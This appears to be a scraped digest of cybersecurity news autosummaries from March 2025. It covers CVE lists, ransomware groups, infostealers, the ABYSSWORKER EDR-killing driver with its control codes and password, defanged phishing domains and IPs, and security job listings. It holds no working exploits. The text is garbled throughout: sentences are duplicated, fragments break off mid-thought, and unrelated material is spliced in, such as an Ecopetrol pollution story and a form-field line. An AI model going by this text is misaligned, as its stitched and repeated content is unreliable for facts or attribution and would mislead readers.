This week"s list includes — CVE-2025-29927 (Next.js), CVE-2025-23120 (Veeam Backup & Replication), CVE-2024-56346, CVE-2024-56347 (IBM Advanced Interactive eXecutive), CVE-2024-10441 (Synology BeeStation Manager, DiskStation Manager, and Unified Controller), CVE-2025-26909 (WP Ghost), CVE-2023-43650, CVE-2023-43651, CVE-2023-43652, CVE-2023-42818, CVE-2023-46123, CVE-2024-29201, CVE-2024-29202, CVE-2024-40628, CVE-2024-40629 (JumpServer), and CVE-2025-0927 (Linux kernel) 📰 Around the Cyber World Google Releases OSV-Scanner 2 — Google has announced the release of an updated iteration of OSV-Scanner, its free vulnerability scanner for open-source developers.Aquatic Panda Attributed to 2022 Espionage Campaign — The China-aligned Aquatic Panda has been linked to a "global espionage campaign" that took place in 2022 targeting seven organizations in Taiwan, Hungary, Turkey, Thailand, France, and the United States.However, by the time this occurs, it may be too late, because sensitive information, such as an API token, may have already been transmitted in cleartext in the initial client request."However, by the time this occurs, it may be too late, because sensitive information, such as an API token, may have already been transmitted in cleartext in the initial client request.""Connections made over cleartext HTTP ports risk exposing sensitive information because the data is transmitted unencrypted and can be intercepted by network intermediaries, such as ISPs, Wi-Fi hotspot providers, or malicious actors on the same network," it noted."Connections made over cleartext HTTP ports risk exposing sensitive information because the data is transmitted unencrypted and can be intercepted by network intermediaries, such as ISPs, Wi-Fi hotspot providers, or malicious actors on the same network," it noted.T-Pot is a powerful, all-in-one honeypot platform that bundles 20+ honeypots with built-in dashboards, live attack maps, and threat analysis tools—no commercial license needed.With built-in subdomain discovery, traffic monitoring, and flexible CLI options, it"s a powerful free tool for security researchers and red teamers looking to automate smarter, context-aware testing."During the attack, the threat actor showed a sophisticated ability to overcome security challenges across multiple domains, including macOS malwares, AWS cloud compromise, application security and smart contract security.""During the attack, the threat actor showed a sophisticated ability to overcome security challenges across multiple domains, including macOS malwares, AWS cloud compromise, application security and smart contract security."To that end, organizations are expected to identify cryptographic services needing upgrades and build a migration plan by 2028, execute high-priority upgrades and refine plans as PQC evolves from 2028 to 2031, and complete migration to PQC for all systems, services and products from 2031 to 2035.To that end, organizations are expected to identify cryptographic services needing upgrades and build a migration plan by 2028, execute high-priority upgrades and refine plans as PQC evolves from 2028 to 2031, and complete migration to PQC for all systems, services and products from 2031 to 2035."The U.K."s demand of Apple raises a number of serious concerns which directly impact national security and therefore warrant robust public debate," according to a joint letter published by Senators Ron Wyden and Alex Padilla, along with Representatives Andy Biggs, Warren Davidson, and Zoe Lofgren."The U.K."s demand of Apple raises a number of serious concerns which directly impact national security and therefore warrant robust public debate," according to a joint letter published by Senators Ron Wyden and Alex Padilla, along with Representatives Andy Biggs, Warren Davidson, and Zoe Lofgren.Unlike traditional scanners, Rogue analyzes each target in real-time, adapting its tests based on responses and generating detailed, easy-to-read reports.Identifying ransomware, data theft, and disinformation as most acute hybrid cybercrime threats, the European police organization said that criminal groups are using cryptocurrency to launder money and move funds around, making their activities harder to detect.Identifying ransomware, data theft, and disinformation as most acute hybrid cybercrime threats, the European police organization said that criminal groups are using cryptocurrency to launder money and move funds around, making their activities harder to detect.Furthermore, third-parties on shared networks could intercept sensitive data from the plaintext HTTP request, or even carry out a Monster-in-the-Middle (MITM) attack by impersonating the web server. "Autosummary:
Both the extensions, per ReversingLabs, incorporate code that"s designed to invoke a PowerShell command, which then grabs a PowerShell-script payload from a command-and-control (C2) server and executes it. "Autosummary:
"Autosummary:
The emergence of VanHelsing coincides with a number of developments in the ever-evolving ransomware landscape - The discovery of new versions of Albabat ransomware that go beyond Windows to Linux and macOS, gathering system and hardware information BlackLock ransomware, a rebranded version of Eldorado, has become one of the most active RaaS groups in 2025, targeting technology, manufacturing, construction, finance, and retail sectors BlackLock is actively recruiting traffers to drive early stages of ransomware attacks, directing victims to malicious pages that deploy malware capable of establishing initial access to compromised systems The JavaScript-based malware framework known as SocGholish (aka FakeUpdates) is being used to deliver RansomHub ransomware, an activity attributed to a threat cluster dubbed Water Scylla The exploitation of security flaws in Fortinet firewall appliances (CVE-2024-55591 and CVE-2025-24472) by a threat actor dubbed Mora_001 since late January 2025 to deliver a newly discovered ransomware strain codenamed SuperBlack, a modified version of LockBit 3.0 that utilizes a custom data exfiltration tool The Babuk2 (aka Babuk-Bjorka) ransomware group has been observed reusing data from earlier breaches associated with RansomHub, FunkSec, LockBit, and Babuk to issue fake extortion demands to victims According to statistics compiled by Bitdefender, February 2025 was the worst month for ransomware in history, hitting a record 962 victims, up from 425 victims in February 2024. "Autosummary:
Medusa ransomware uses malicious Windows driver ABYSSWORKER to disable security tools Pierluigi Paganini March 24, 2025 March 24, 2025 Medusa ransomware uses a malicious Windows driver ABYSSWORKER to disable security tools, making detection and mitigation more difficult. "Autosummary:
This alert also provides detailed steps on how to file these requests, including logging into your account, going into Settings, clicking "View" next to "23andMe Data" (here you also have the option to download your data first), scrolling to "Delete Data," and clicking "Permanently Delete Data." "Autosummary:
The malware supports rich CLI customization to tailor attacks per victim, such as targeting specific drives and folders, restricting the scope of encryption, spreading via SMB, skipping shadow copies deletion, and enabling two-phase stealth mode. "Autosummary:
The incident forced people to booths to buy physical tickets, causing overcrowding, delays, long waiting times, and frustration. "Autosummary:
As the operation matured, Weaver Ant introduced a more advanced, custom-build web shell known as INMemory, which leverages a DLL (eval.dll) for stealthy ‘just-in-time code execution.’ "Autosummary:
" The shortcomings are listed below - CVE-2025-24514 – auth-url Annotation Injection – auth-url Annotation Injection CVE-2025-1097 – auth-tls-match-cn Annotation Injection – auth-tls-match-cn Annotation Injection CVE-2025-1098 – mirror UID Injection – mirror UID Injection CVE-2025-1974 – NGINX Configuration Code Execution In an experimental attack scenario, a threat actor could upload a malicious payload in the form of a shared library to the pod by using the client-body buffer feature of NGINX, followed by sending an AdmissionReview request to the admission controller. "Autosummary:
The China Chopper web shell, originally developed by Chinese threat actors, enables remote access and control over compromised web servers, facilitating persistent access, command execution, and data exfiltration.These commands included: ‘Get-DomainUserEvent’, ‘Get-DomainSubnet’, ‘Get-DomainUser’, ‘Get-NetSession’ etc.” "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Critical Veeam Backup & Replication RCE vulnerability fixed, patch ASAP! (CVE-2025-23120) Veeam has released fixes for a critical remote code execution vulnerability (CVE-2025-23120) affecting its enterprise Veeam Backup & Replication solution, and is urging customers to quickly upgrade to a fixed version. FBI: Free file converter sites and tools deliver malware Malware peddlers are increasingly targeting users who are searching … More
The post Week in review: Veeam Backup & Replication RCE fixed, free file converter sites deliver malware appeared first on Help Net Security.
"Autosummary:
Moving beyond checkbox security for true resilience In this Help Net Security interview, William Booth, director, ATT&CK Evaluations at MITRE, discusses how CISOs can integrate regulatory compliance with proactive risk management, prioritize spending based on threat-informed assessments, and address overlooked vulnerabilities like shadow IT and software supply chain risks. "Autosummary:
The FBI also says that the uploaded documents can also be scraped for sensitive information, such as names, social security numbers, cryptocurrency seeds, passphrases, wallet addresses, email addresses, passwords, and banking information." This JavaScript file is Gootloader, a malware loader known for downloading additional malware, such as banking trojans, infostealers, malware downloaders, and post-exploitation tools, like Cobalt Strike beacons. "Autosummary:
"Autosummary:
The prices are depending on limitations of zero-days and obtained privileges.… — Operation Zero (@opzero_en) March 20, 2025 A zero-day broker like Operation Zero might be willing to pay millions for Telegram exploits for several reasons, including: Government and Intelligence Demand – Telegram is widely used for secure communication, including by journalists, activists, dissidents, and political figures. "Autosummary:
"Autosummary:
Abusing Microsoft Trusted Signing service Recently, cybersecurity researchers have seen threat actors utilizing the Microsoft Trusted Signing service to sign their malware with short-lived, three-day code-signing certificates." "In this regard, the verification process for Microsoft"s certificates is substantially easier than the verification process for EV certificates: due to the ambiguity over EV certificates, it makes sense to use the Microsoft certificates. "Autosummary:
Abusing Microsoft Trusted Signing service Recently, cybersecurity researchers have seen threat actors utilizing the Microsoft Trusted Signing service to sign their malware with short-lived, three-day code-signing certificates." "In this regard, the verification process for Microsoft"s certificates is substantially easier than the verification process for EV certificates: due to the ambiguity over EV certificates, it makes sense to use the Microsoft certificates. "Ransomware is the top predicted threat for 2025, which is especially concerning given 38% of security professionals say ransomware will become even more dangerous when powered by AI, according to Ivanti. In comparison to the threat level, only 29% of security professionals say they are very prepared for ransomware attacks – leaving a significant gap in preparedness (29%), highlighting the need for more robust security measures. Strong understanding of exposure management among security leaders A … More
The post AI will make ransomware even more dangerous appeared first on Help Net Security.
"Autosummary:
“However, for exposure management to be successful, organizations should ensure collaboration between security and other departments, conduct risk assessments that align with the organization’s risk appetite, and prioritize mitigation of the most impactful vulnerabilities.” "AI-powered phishing emails, deepfake phone calls, and fake tax prep websites are making tax scams more convincing and costly than ever, according to McAfee. Cybercriminals are pulling out all the stops to trick Americans out of their hard-earned money, and it’s working, nearly one in four Americans say they or someone they know has lost money to a tax scam. Fraudsters are becoming more sophisticated More than half of Americans say fraud is more sophisticated … More
The post Scammers cash in on tax season appeared first on Help Net Security.
"Autosummary:
Here’s what they’re asking for most: Social security number or tax identification number (40%) Back taxes payment demand (27%) Birth date (26%) Home address (25%) Phone number (22%) Email address (21%) Bank account numbers (18%) Credit/debit card information (17%) Fake tax refund offer (15%) To protect yourself, ignore unexpected messages claiming to be from the IRS—official tax communications come by mail, not through texts, emails, or phone calls. "Autosummary:
"Autosummary:
Cisco disclosed two vulnerabilities in its Smart Licensing Utility: CVE-2024-20439, a static credential backdoor, and CVE-2024-20440, an information disclosure flaw. "Autosummary:
The suspicious title on Steam Source: Internet Archive Analyzing the installer file, Reddit users noticed that it was named "Windows Defender SmartScreen.exe" and discovered commodity attack tools such as a privilege escalation utility, a Node.js wrapper, and the tool "Fiddler," which could intercept cookies. "A vulnerability (CVE-2024-48248) in NAKIVO Backup and Replication, a backup, ransomware protection and disaster recovery solution designed for organizations of all sizes and managed service providers (MSPs), is being actively exploited. The US Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities catalog on Wednesday, but it’s yet unknown whether the flaw is being leveraged by ransomware attackers, who often try to delete existing backups to make it more … More
The post NAKIVO Backup & Replication vulnerability exploited by attackers (CVE-2024-48248) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The list of some of the I/O control codes is below - 0x222080 - Enable the driver by sending a password "7N6bCAoECbItsUR5-h4Rp2nkQxybfKb0F-wgbJGHGh20pWUuN1-ZxfXdiOYps6HTp0X" 0x2220c0 - Load necessary kernel APIs 0x222184 - Copy file 0x222180 - Delete file 0x222408 - Kill system threads by module name 0x222400 - Remove notification callbacks by module name 0x2220c0 - Load API 0x222144 - Terminate process by their process ID 0x222140 - Terminate thread by their thread ID 0x222084 - Disable malware 0x222664 - Reboot the machine Of particular interest is 0x222400, which can be used to blind security products by searching and removing all registered notification callbacks, an approach also adopted by other EDR-killing tools like EDRSandBlast and RealBlindingEDR. "Autosummary:
"Autosummary:
Some of the other utilities used are quser.exe, tasklist.exe, and netstat.exe for system reconnaissance fscan and SoftPerfect Network Scanner for local network reconnaissance ADRecon for gathering information from Active Directory Mimikatz, secretsdump, and ProcDump for credential harvesting RDP for lateral movement mRemoteNG, smbexec, wmiexec, PAExec, and PsExec for remote host communication Rclone for data transfer The attacks culminate with the deployment of LockBit 3.0 and Babuk ransomware on compromised hosts, followed by dropping a note that urges victims to contact them on Telegram for decrypting their files. "Autosummary:
"Enterprises lack visibility into their own data, creating security risks that are compounding as organizations and their employees increase AI adoption, according to Bedrock Security. The majority of organizations struggle to track sensitive information across sprawling cloud environments, leaving them vulnerable to data breaches and compliance failures. The research also documents a significant shift in security roles, with nine in 10 professionals surveyed reporting their responsibilities have evolved in the past year, most notably in … More
The post 53% of security teams lack continuous and up-to-date visibility appeared first on Help Net Security.
"Autosummary:
Looking ahead, organizations: will focus on AI/ML data usage governance (70%) aim to strengthen policy enforcement across cloud environments (64%) want more accurate data classification (58%) plan to improve security tools with better data awareness (53%) will increase infrastructure security focus (68%) “These priorities show a clear shift toward data-centric security,” said Kurtic. Broken out by role: CISOs/CSOs/CTOs: Almost 70% of these respondents have taken on new data discovery responsibilities, specifically for AI initiatives Security managers/directors: 55% of these respondents added data governance duties for AI training Security engineers/architects: 52% of these respondents have new AI data discovery responsibilities Most organizations can’t track what data feeds their AI systems 48% of organizations express high confidence in controlling sensitive data used for AI/ML training. "Autosummary:
“The infrastructure we found is linked to webpages entitled “Paragon” returned by IP addresses in Israel (where Paragon is based), as well as a TLS certificate containing the organization name “Graphite”, which is the name of Paragon’s spyware, and the common name “installerserver” (Pegasus, a competitor spyware product, uses the term “Installation Server” to refer to a server designed to infect a device with spyware).” "Autosummary:
The BBC saw a black, oily-looking substance and containment barriers at one of the sites listed in the database as "only known to Ecopetrol" Ecopetrol"s CEO from 2017 to 2023, Felipe Bayón, told the BBC he strongly denied suggestions that there was any policy to withhold information about pollution.Pointing to it, Yuly Velásquez, president of Fedepesan, a federation of fishing organisations in the region, said: "This is all grease and waste that comes directly from the Ecopetrol refinery."We found turtles, capybaras, birds, thousands of dead fish," she said last June. Mr Olarte says he realised "something was wrong" soon after joining Ecopetrol Andrés Olarte, the whistleblower who has shared the company"s data, says pollution by the firm dates back many years."There is always that risk of some sort of contagion between the private security companies, the types of people they employ, and their desire to continually maintain their contract," Mr Smith says. "Kali Linux 2025.1a is now available. This release enhances existing features with improvements designed to streamline your experience. 2025 theme refresh Kali Linux 2025.1a introduces an annual theme refresh, maintaining a modern interface. This year’s update debuts a redesigned theme aimed at enhancing the user experience from startup. Users can expect notable visual updates, including an improved boot menu, a refined login screen, and a selection of new desktop wallpapers for both Kali and Kali … More
The post Kali Linux 2025.1a drops with theme refresh, Kali NetHunter updates appeared first on Help Net Security.
"Autosummary:
Samsung Galaxy S9 (Exynos9810 – LineageOS 20/Android 13) Samsung Galaxy S10 (Exynos9820 – LineageOS 21 & LineageOS 22.1) Xiaomi Redmi Note 6 Pro (Android 11) Download Kali Linux 2025.1a is now available to download or upgrade if you’re already running Kali Linux. "Autosummary:
By offering proactive compliance monitoring with Compliance Manager GRC, you can: ✅ Help clients avoid fines and security risks ✅ Automate compliance reporting and streamline audits ✅ Expand their service offerings and increase revenue ✅ Build long-term relationships with businesses in need of compliance expertise With compliance regulations only getting stricter, MSPs that invest in continuous compliance solutions today will be well-positioned for long-term success. New Features That Make Compliance Manager GRC Even More Powerful Compliance Monitor: Continuous Compliance Monitoring Compliance Monitor enables automated, ongoing compliance monitoring, ensuring MSPs and their clients stay compliant with minimal manual effort. How MSPs Can Implement Continuous Compliance Monitoring To successfully offer compliance monitoring, you should: Leverage Automated Compliance Tools – Use platforms like Compliance Manager GRC that provide real-time compliance assessments and reporting. Together, Compliance Monitor and Risk Manager make Compliance Manager GRC a no-brainer for MSPs looking to save time, reduce risk, and turn compliance into a high-value service.— Javier Dugarte, VP of Sales and Operations, GoCloud Inc. With Compliance Manager GRC, MSPs can turn compliance into a competitive advantage, securing high-value clients and unlocking new revenue streams. "Autosummary:
"Autosummary:
The DCRat consists of three components: A stealer/client executable A single PHP page, serving as the command-and-control (C2) endpoint/interface An administrator tool In June 2022, the Governmental Computer Emergency Response Team of Ukraine (CERT-UA) warned of another malware campaign targeting Ukrainian telecommunications operators with the DarkCrystal RAT. "Autosummary:
But while that may be valuable for compliance purposes, these kinds of point-in-time assessments simply don’t align with modern development practices and cybersecurity requirements: With each code iteration, security snapshots lose relevance Patch verification stalls until the next scheduled assessment window Development teams get large batches of findings rather than actionable, real-time feedback Limited tester and retesting availability creates bottlenecks in security testing Communication barriers between developers and testers slow down remediation to a crawl Continuous testing for modern development Penetration Testing as a Service (PTaaS) offers a more flexible approach that better aligns with rapid development cycles. Real-time vulnerability reporting lets you take immediate action on critical issues Developers and testers can directly communicate, speeding up remediation Unlimited retesting lets you verify fixes without waiting for the next assessment cycle Having access to diverse tester expertise ensures comprehensive security coverage and could even eliminate the need for vendor rotation Hybrid approach combines the best of both automated scanning as well as manual testing expertise to cover all possible vulnerability sources Beyond just finding vulnerabilities Finding vulnerabilities is only half the battle — rapid remediation requires that security teams partner closely with developers. "Veeam has released fixes for a critical remote code execution vulnerability (CVE-2025-23120) affecting its enterprise Veeam Backup & Replication solution, and is urging customers to quickly upgrade to a fixed version. There is currently no indication that the vulnerability is being leveraged by attackers. It was privately reported by researcher Piotr Bazydlo of watchTowr Labs, who followed the release of the patch with a technical write-up and pointers on how a proof-of-concept exploit for a … More
The post Critical Veeam Backup & Replication RCE vulnerability fixed, patch ASAP! (CVE-2025-23120) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Targets of these attacks included individuals spread across over two dozen countries, including several in Europe such as Belgium, Greece, Latvia, Lithuania, Austria, Cyprus, Czech Republic, Denmark, Germany, the Netherlands, Portugal, Spain, and Sweden. "Autosummary:
Directory Traversal Vulnerability In early March, 2025, US CISA warned that multiple botnets are exploiting a recently disclosed vulnerability, tracked as CVE-2025-1316 (CVSS score of 9.8), in Edimax IC-7100 IP cameras. "Autosummary:
Since it surfaced, the ransomware gang has claimed multiple high-profile victims, including oil services giant Halliburton, the Christie"s auction house, US telecom provider Frontier Communications, the Rite Aid drugstore chain, Kawasaki"s EU division, the Planned Parenthood sexual health nonprofit, and the Bologna Football Club. "Autosummary:
It also offers protection against SQL injection, script injection, vulnerability exploitation, malware dropping, file inclusion exploits, directory traversal attacks, and cross-site scripting. "Autosummary:
Malicious Semrush domains adsense-word[.]com auth[.]semrush[.]help sem-russhh[.]com sem-rushhh[.]com sem-rushh[.]com semrush[.]click semrussh[.]sbs semrush[.]tech seemruush[.]com semrush-auth[.]com auth.seem-rush[.]com ads-semrush[.]com semrush-pro[.]co semrush-pro[.]click auth.sem-ruush[.]com semrush[.]works We don’t just report on threats – we help safeguard your entire digital identity Cybersecurity risks should never spread beyond a headline. As part of our investigations, we uncovered a new operation going after Semrush, a visibility management SaaS platform that offers SEO, advertising, and market research, amongst other things.In GSC, the bad actors could see historical data for the past 16 months, including but not limited to search queries, pages, countries, devices, search appearance and dates. "AI Security Architect Verizon | USA | Hybrid – View job details As an AI Security Architect, you will ensure security architecture reviews are integrated into Verizon’s AI development lifecycle. This includes embedding robust security measures from design to deployment, conducting risk assessments on AI models, and implementing security tools and protocols in AI/ML operations. Application Penetration Tester – Cyber Security Supervisor RSM US LLP | USA | Hybrid – View job details As an … More
The post Cybersecurity jobs available right now in the USA: March 20, 2025 appeared first on Help Net Security.
"Autosummary:
Senior Application Security Engineer CLEAR | USA | On-site – View job details As a Senior Application Security Engineer, you will perform security risk assessments, manual penetration security testing, automate security testing, threat modeling, and develop/conduct education on secure coding. CISO Equinix | USA | Hybrid – View job details As a CISO, you will develop and execute a comprehensive information security strategy that is aligned with business objectives, risk appetite, goals, regulatory requirements, and industry best practices. Network Security Engineer (DevSecOps) Intel | USA | Hybrid – View job details As a Network Security Engineer (DevSecOps), you will assist in architecting network security products, including testing, validation, and selection.You will tune and enhance system infrastructure for security, automate manual tasks through scripting and application development, investigate and adopt new security technologies and tools as needed, and evaluate, test, and integrate new security controls, settings, and tools. "Autosummary:
Besides stealing login credentials, passwords, credit card data, and cookies from various Chromium- and Gecko-based browsers, Arcane is equipped to harvest comprehensive system data as well as configuration files, settings, and account information from several apps such as follows - VPN clients: OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, Proton, hidemy.name, PIA, CyberGhost, and ExpressVPN Network clients and utilities: ngrok, Playit, Cyberduck, FileZilla, and DynDNS Messaging apps: ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, and Viber Email clients: Microsoft Outlook Gaming clients and services: Riot Client, Epic, Steam, Ubisoft Connect (ex-Uplay), Roblox, Battle.net, and various Minecraft clients Crypto wallets: Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, and Coinomi Furthermore, Arcane is designed to take screenshots of the infected device, enumerate running processes, and list saved Wi-Fi networks and their passwords. "Autosummary:
"Autosummary:
The extensions, named "ahban.shiba" and "ahban.cychelloworld," were downloaded seven and eight times, respectively, before they were eventually removed from the store. "Autosummary:
"Autosummary:
In addition, BlackLock has been actively attracting new affiliates on RAMP, a Russian-language ransomware-focused cybercrime forum, as well recruiting developers, initial access brokers and traffers (people who direct victims to malicious content.) BlackLock follows a RaaS (ransomware-as-a-service) business model, leasing its tools and infrastructure to affiliates who launch attacks, sharing a proportion of the proceeds with BlackLock. "Autosummary:
A deserialization flaw is when an application improperly processes serialized data, allowing attackers to inject malicious objects, or gadgets, that can execute harmful code. "Autosummary:
Compromised personal information includes full names in combination with one or more of the following elements: Date of Birth, Driver’s License or State ID, Social Security Number, Account Number, Account PIN, Security Code, Password and Routing Number, Payment Card Number, Payment Card PIN and Payment Card Expiration Date, Passport Number, Taxpayer ID Number, Username and Password, Health Insurance Information and Medical Information. "Autosummary:
"tj-actions/eslint-changed-files uses reviewdog/action-setup@v1, and the tj-actions/changed-files repository runs this tj-actions/eslint-changed-files Action with a Personal Access Token," Wiz researcher Rami McCarthy said. "Outseer announced its platform-native Behavioral Biometrics capability. The addition of platformized Behavioral Biometrics introduces another layer of defense that continuously analyzes user interactions to detect anomalies in real time. Building on its rich RSA heritage (formerly RSA Fraud & Risk Intelligence), Outseer has enhanced its platform to counter modern cyber threats. As fraud evolves, spurred by the digitization of payments, the spread of personal data across the dark web, the growing threat of scams and … More
The post Outseer introduces Behavioral Biometrics capability appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2025-24472 Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability CVE-2025-30066 tj-actions/changed-files GitHub Action Embedded Malicious Code Vulnerability In February, Fortinet warned that threat actors were exploiting a new zero-day vulnerability, tracked as CVE-2025-24472 (CVSS score of 8.1), in FortiOS and FortiProxy to hijack Fortinet firewalls. The tj-actions/changed-files GitHub Action is used in over 23,000 repositories, it automates workflows by detecting file changes in commits or pull requests, aiding testing, and automation. However Mora_001 is tracked as an independent threat actor, it exhibits consistent post-exploitation tactics, including identical usernames across victims, overlapping IPs, and rapid ransomware deployment within 48 hours. "Autosummary:
Comparing a legitimate page’s DOM structure with an attacker’s cloned page Source: Push Security They’re also randomizing page titles, dynamically decoding text, changing the size and name of image elements, using different favicons, blurring backgrounds, substituting logos, and more… all to defeat common detections. For example, recent examples of Adversary-in-the-Middle phishing kits including Tycoon, Nakedpages, Evilginx were seen to rotate the URLs they resolve to (from a continually refreshed pool of URLs), mask the HTTP Referer header to disguise suspicious redirects, and redirect to benign (legitimate) domains if anyone but the intended victims attempted to visit the page. If you’re using an email security solution, you’re relying on the following core capabilities when it comes to detecting malicious phishing pages: Known-bad blocklists: Block users from accessing known-bad or unapproved domains/URLs, and block traffic from known-bad malicious IPs, using Threat Intelligence (TI) feeds. This also applies to other solutions that rely on these capabilities, such as web-based content filtering (e.g. Google Safe Browsing), CASB, SASE, SWG, etc. However, because the attacker is sitting in the middle of this connection, they are able to observe all interactions, intercept authentication material like credentials, MFA codes, and session tokens to take control of the authenticated session and gain control of the user account. A better solution to the problem would therefore be able to follow the user across the sites they use, and see the actual phishing pages as the user sees them, as opposed to a sandbox (which, as we’ve discussed, attackers are well prepared for). "Autosummary:
IOCs 34[.]123[.]196[.]68 34[.]132[.]227[.]60 34[.]31[.]92[.]173 aidforhealthcare[.]org americansubsidy[.]com assistanceadvocate[.]org assistanceadvocates[.]org communitycareaid[.]org grabsubsidy[.]com healthaidhub[.]org healthaidnetwork[.]org improveourcredit[.]com justhealthbenefits[.]com local-subsidy[.]com localaid[.]co nationaid[.]org nationwidesubsidy[.]com qualifyaca[.]com subsidyacrossnation[.]com subsidyaid[.]com subsidysupport[.]org subsidysupportnetwork[.]org timeforacahelp[.]com us-debtassistance[.]org wellnesssubsidyhub[.]org Whether it’s a so-called “subsidy program,” a “government grant,” or a “relief card,” these scams all share the same underlying goal—to manipulate people into giving away their personal information, or—worse—their hard-earned cash. Common free money scams Too-good-to-be-true claims: “Get a $6,400 Subsidy to Pay for Groceries, Rent, and Gas!” "Autosummary:
The Breach Notification Rule requires the provision of a notification to affected individuals, the Secretary of Health and Human Services, and, in certain circumstances, to the media, in the event of a breach of unsecured PHI. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. The handling, storage, and sharing of protected health information (PHI) within sperm banks falls under the Health Insurance Portability and Accountability Act (HIPAA): The Privacy Rule requires sperm banks to implement safeguards to protect the privacy of PHI and sets limits and conditions on the uses and disclosures that can be made without patient consent. "GitGuardian’s State of Secrets Sprawl 2025 report shows no progress in combating secrets sprawl, with 23.8 million secrets leaked on public GitHub repositories in 2024—a 25% year-over-year increase. Despite GitHub Push Protection’s efforts, secrets sprawl is accelerating, especially with generic secrets, which made up 58% of all leaked credentials. More troubling, 70% of secrets leaked in 2022 remain active, significantly expanding the attack surface for threat actors. The report makes one thing clear: secrets management … More
The post Report: The State of Secrets Sprawl 2025 appeared first on Help Net Security.
"Autosummary:
"State-sponsored threat actors and cybercrime groups from North Korea, Iran, Russia, and China have been exploiting a zero-day Windows vulnerability with no fix in sight for the last eight years, researchers with Trend Micro’s Zero Day Initiative have warned on Tuesday. The vulnerability, which doesn’t have a CVE number but is being tracked as ZDI-CAN-25373 by ZDI researchers, allowed attackers to surreptitiously execute malicious commands on a victim’s machine and deliver a variety of malware … More
The post APTs have been using zero-day Windows shortcut exploit for eight years (ZDI-CAN-25373) appeared first on Help Net Security.
"Autosummary:
Unfortunately, users are unable to spot anything suspicious, as the Target field is padded with whitespace or other characters so that Windows will not be able to show the malicious arguments within the allotted space in the user interface: The Target field seems empty because of whitespace padding (Source: Trend Micro) “By exploiting ZDI-CAN-25373, the threat actor can prevent the end user from viewing critical information (commands being executed) related to evaluating the risk level of the file,” the researchers explained. "Autosummary:
"Autosummary:
Initial responsible disclosure to Cursor Initial responsible disclosure to Cursor February 27, 2025: Cursor replied that they are investigating the issue Cursor replied that they are investigating the issue March 6, 2025: Cursor replied and determined that this risk falls under the users’ responsibility Cursor replied and determined that this risk falls under the users’ responsibility March 7, 2025: "Autosummary:
"Autosummary:
"Autosummary:
"The complaint highlights actual statistics on Click Profit"s stores, which are mainly on Amazon, showing that after Amazon"s fees, more than one-fifth of the company"s stores on the platform earn no money at all and another third earns less than $2,500 in gross lifetime sales," reads FTC"s announcement. "Autosummary:
"The infrastructure we found is linked to webpages entitled "Paragon" returned by IP addresses in Israel (where Paragon is based), as well as a TLS certificate containing the organization name "Graphite, "which is the name of Paragon"s spyware, and the common name "installerserver" (Pegasus, a competitor spyware product, uses the term" Installation Server" to refer to a server designed to infect a device with spyware). "Autosummary:
Cybersecurity company Bitdefender said it has observed a surge in exploitation attempts against CVE-2024-4577 since late last year, with a significant concentration reported in Taiwan (54.65%), Hong Kong (27.06%), Brazil (16.39%), Japan (1.57%), and India (0.33%). "Autosummary:
California Cryobank, the largest US sperm bank, disclosed a data breach Pierluigi Paganini March 19, 2025 March 19, 2025 California Cryobank, the largest US sperm bank, suffered a data breach exposing customer information. "Autosummary:
" PSEA says the stolen information varies by individual and consists of personal, financial, and health data, including driver"s license or state IDs, social security numbers, account PINs, security codes, payment card information, passport information, taxpayer ID numbers, credentials, health insurance and medical information. "Autosummary:
"Autosummary:
"While previously thought to be separate campaigns, our research reveals these attacks share common infrastructure, code patterns, and monetization methods - all appearing to be connected to a single, sophisticated threat actor. "Autosummary:
Unfortunately, the team said this release is mostly focused on updates, so only one tool was included this time: hoaxshell - Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell In addition to Hoaxshell, Kali says they upgraded the Kernel version to 6.12. "In this Help Net Security interview, Sunil Mallik, CISO of Discover Financial Services, discusses cybersecurity threats for financial institutions. He also shares insights on balancing compliance with agility, lessons from regulatory audits, and Discover’s approach to risk management and workforce development. What are the most pressing security threats facing credit card and digital banking platforms, and how should organizations adapt defenses to counter them? The most pressing security threats facing credit card companies and digital … More
The post How financial institutions can minimize their attack surface appeared first on Help Net Security.
"Autosummary:
For example, I’m involved with the National Cybersecurity Alliance, American Transaction Processors Coalition and Financial Services Information Sharing and Analysis Center (FS-ISAC), which helps me stay connected with industry standards and best practices, ensuring we remain agile and compliant.Proactive measures, such as threat hunting, regular vulnerability assessments, and security awareness training, help prevent attacks before they occur.To counter these threats, financial services organizations should implement advanced threat detection systems, conduct regular security assessments, and educate customers about potential scams. "Application Security Expert monday.com | United Kingdom | Hybrid – View job details As an Application Security Expert, you will provide guidance on security best practices and compliance, and undertake security testing. Develop security testing plans and integrate them into the software development lifecycle. Perform and oversee security testing and manage remediation of identified vulnerabilities. Application Security Analyst II, Information Security First National Financial | Canada | On-site – View job details As an Application … More
The post Cybersecurity jobs available right now: March 18, 2025 appeared first on Help Net Security.
"Autosummary:
Manager, Cybersecurity with Data security, Security AI, DLP NielsenIQ | India | On-site – View job details As a Manager, Cybersecurity with Data security, Security AI, DLP, you will lead the design, implementation, and management of data security solutions, including but not limited to DLP, CASB, database security, and DSPM. Application Security Analyst II, Information Security First National Financial | Canada | On-site – View job details As an Application Security Analyst II, Information Security, you will analyze and document processes, policies, controls, and standards to ensure compliance with security frameworks and regulations. Cyber Security Engineer METEOR | Malaysia | On-site – View job details As a Cyber Security Engineer, you will be responsible for application security, cybersecurity, network security, information security, and vulnerability assessment. I have read and agree to the terms & conditions Leave this field empty if you"re human: Cryptographic Key Operations Lead, Vice President State Street | Ireland | On-site – View job details As a Cryptographic Key Operations Lead, Vice President, oversee the daily operations and security of cryptographic key management, ensuring compliance with financial industry regulations. "Autosummary:
